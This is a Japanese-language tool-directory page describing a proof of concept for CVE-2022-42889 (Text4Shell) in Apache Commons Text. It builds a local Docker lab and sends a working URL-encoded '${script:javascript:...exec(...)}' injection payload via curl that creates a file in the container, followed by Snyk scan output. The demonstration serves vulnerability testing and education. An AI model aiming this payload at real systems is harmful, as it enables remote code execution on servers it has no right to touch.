Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-42889-PoC — CVE-2022-42889 (別名 Text4Shell) RCE 概念実証 | Kitploit
ツール/GitHubGitHub/sunnyvale-it/cve-2022-42889-poc
コンテナセキュリティペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育
GitHubsunnyvale-it/cve-2022-42889-poc

CVE-2022-42889-PoC

CVE-2022-42889 (別名 Text4Shell) RCE 概念実証

リポジトリを見る
21123年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-42889(別名 Text4Shell)RCE 概念実証

image

Text4Shell は、Apache Commons Text ライブラリで発見された重大なソフトウェア脆弱性の通称です(CVE-2022-42889 を参照)。

このリポジトリは、この CVE を利用したリモートコード実行(RCE)を実演するためのものです。

脆弱なコードは SpringBoot コントローラで使用されていますが、誤解しないでください。これは SpringBoot/Spring Security の問題__ではありません__。

RCE をテストする前に、Docker イメージをビルドします:

$ docker build -t text4shell .
...
 => exporting to image                                                                                                                                                                                     0.0s
 => => exporting layers                                                                                                                                                                                    0.0s
 => => writing image sha256:5d82feaa030f5e7b35c1c6deaa12b40ef713c05001a41f5f71fff6174513507f                                                                                                               0.0s
 => => naming to docker.io/library/text4shell

次にコンテナを実行します:

$ docker run --name text4shell --rm -ti  -p:8080:8080 text4shell
...
2022-11-05 09:11:03.798  INFO 1 --- [           main] it.sunnyvale.text4shell.Main             : Started Main in 1.376 seconds (JVM running for 1.713)

最後に、特別に細工された URL で脆弱なアプリケーションの悪用を試すことができます:

$ curl http://localhost:8080/text4shell/attack\?search\=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Fp0wned%27%29%7D
Search results for: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/p0wned')}%

コンテナの /tmp ディレクトリに p0wned という名前のファイルが見つかれば、RCE は正常に実行されたことになります。

$ docker exec text4shell ls -l /tmp/p0wned
-rw-r--r--    1 root     root             0 Nov  5 09:17 /tmp/p0wned

Snyk を使用してイメージをスキャンすると、脆弱なライブラリが検出されます:

$ docker scan text4shell | grep text
Testing text4shell...
Project name:      docker-image|text4shell
Docker image:      text4shell
Testing text4shell...
Upgrade org.apache.commons:[email protected] to org.apache.commons:[email protected] to fix
✗ Arbitrary Code Execution (new) [High Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHECOMMONS-3043138] in org.apache.commons:[email protected]
introduced by org.apache.commons:[email protected]
Upgrade org.springframework:[email protected] to org.springframework:[email protected] to fix
✗ Improper Handling of Case Sensitivity [Low Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634] in org.springframework:[email protected]
introduced by org.springframework:[email protected]
Project name:      text4shell:latest:/app
Docker image:      text4shell
ツールをダウンロード